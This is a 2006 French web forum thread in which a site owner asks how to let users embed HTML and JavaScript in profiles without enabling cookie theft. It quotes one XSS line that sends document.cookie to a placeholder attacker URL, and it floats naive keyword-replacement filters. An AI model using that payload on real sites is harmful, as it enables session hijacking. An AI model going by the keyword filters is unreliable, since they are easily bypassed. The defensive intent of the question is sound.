sécuritée du html sur site distant et vol de cookie

Recherche :

Mot : Pseudo : Filtrer
Bas de page
Auteur	Sujet : sécuritée du html sur site distant et vol de cookie

scull

MySCULL cay bon mangez en!

Bonjour à tous.

Je voudrais proposer prochainement aux utilisateurs de mon site de pouvoir mettre du html et javascript dans leurs profil.
Mème si ce sont des personnes "normales" qui n'iront pas sabotez leur propre page à coups de alert(lol);, d'autres personnes pourraient elles ètre tenté de piquer les mots de passe.

Je me demandais si le simple fait d'utiliser un str_replace de "cookie" en "cook!e" pourrait bloquer ces tentatives ?
Je sais que c'est bien crade, mais quel fonction laisse le javascript et empèche le vol de cookies ? [:barthaliastoxik]

D'ailleur si l'un d'entre vous à plus d'infos sur le vol de cookie, n'hésitez pas à faire tourner le lien.
Merci

Message édité par scull le 18-07-2006 à 23:06:47

Publicité

scull

MySCULL cay bon mangez en!

Visiblement le vol de cookie ce fait avec ce genre de commande :

Code :

<img src="javascript:var ima=new Image(); ima.src=' htp://site_du_pirate.com/recup.php?cookie='+document.cookie">

Donc si je bannis le mot "document.cookie", il n'est plus possible de copier les cookies ? Confirmation ?

Message édité par scull le 18-07-2006 à 23:21:41

FORUM HardWare.fr

Programmation

HTML/CSS

sécuritée du html sur site distant et vol de cookie

Sujets relatifs
cherche un site d'aide pour fichier .bat	Site aux normes?
creer un bouton en html	Mon texte dépasse des cadres, que modifier dans le code html ?
Impression pages html	Dimension automatique du site
probleme sur mon site...	video html
nbr de site perso possible chez Free	Ce qu'implique de choisir le XHTLM par rapport au HTML
Plus de sujets relatifs à : sécuritée du html sur site distant et vol de cookie

Page générée en 0.048 secondes